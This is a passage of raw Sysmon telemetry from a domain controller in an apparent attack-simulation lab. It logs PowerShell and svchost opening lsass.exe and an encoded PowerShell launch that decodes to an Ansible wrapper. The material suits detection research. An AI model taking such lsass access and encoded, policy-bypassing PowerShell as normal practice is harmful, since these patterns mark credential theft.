57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e65(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66239cc6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66239296(wow64) 154100x80000000000000003737Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.950{10ACEC4A-8583-5FCF-BA00-000000009101}816C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8583-5FCF-F6EB-060000000000}0x6ebf60HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{10ACEC4A-8583-5FCF-B900-000000009101}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003736Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.939{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003735Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.939{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003734Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.923{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003733Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.877{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8583-5FCF-B900-000000009101}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003732Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.877{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8583-5FCF-B900-000000009101}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x80000000000000003731Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.676{10ACEC4A-8581-5FCF-B200-000000009101}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50354-false152.199.19.161-443https 354300x80000000000000003730Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.646{10ACEC4A-8581-5FCF-B200-000000009101}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50353-false184.24.15.126a184-24-15-126.deploy.static.akamaitechnologies.com443https 11241100x80000000000000003729Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.845{10ACEC4A-8583-5FCF-B900-000000009101}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_bpxj03k2.vx3.ps12020-12-08 13:54:11.845 10341000x80000000000000003728Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.830{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8583-5FCF-B900-000000009101}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003727Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.814{10ACEC4A-8583-5FCF-B600-000000009101}45204532C:\Windows\system32\conhost.exe{10ACEC4A-8583-5FCF-B900-000000009101}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003726Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.814{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003725Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.814{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003724Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.814{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003723Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.814{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003722Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.814{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003721Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.814{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003720Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.814{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003719Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.814{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003718Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.814{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003717Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.814{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8583-5FCF-B900-000000009101}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003716Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.814{10ACEC4A-8583-5FCF-B800-000000009101}33284976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8583-5FCF-B900-000000009101}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+669a255d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65e43167(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65e42e38(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+668f471d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65e039ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65e61e9d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65e45502(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65e45502(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65e45393(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65e37318(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65e4384b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65e4343e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65e43167(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65e42e38(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+668f471d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65e29c99(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65e29269(wow64) 154100x80000000000000003715Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.816{10ACEC4A-8583-5FCF-B900-000000009101}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 